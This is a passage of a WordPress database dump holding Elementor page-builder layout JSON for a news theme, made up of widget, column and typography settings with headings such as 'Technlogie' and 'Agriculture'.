"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1189,435,'_elementor_version','0.4'),(1190,435,'_elementor_css','a:3:{s:4:\"time\";i:1508877844;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1191,436,'_elementor_edit_mode','builder'),(1192,436,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\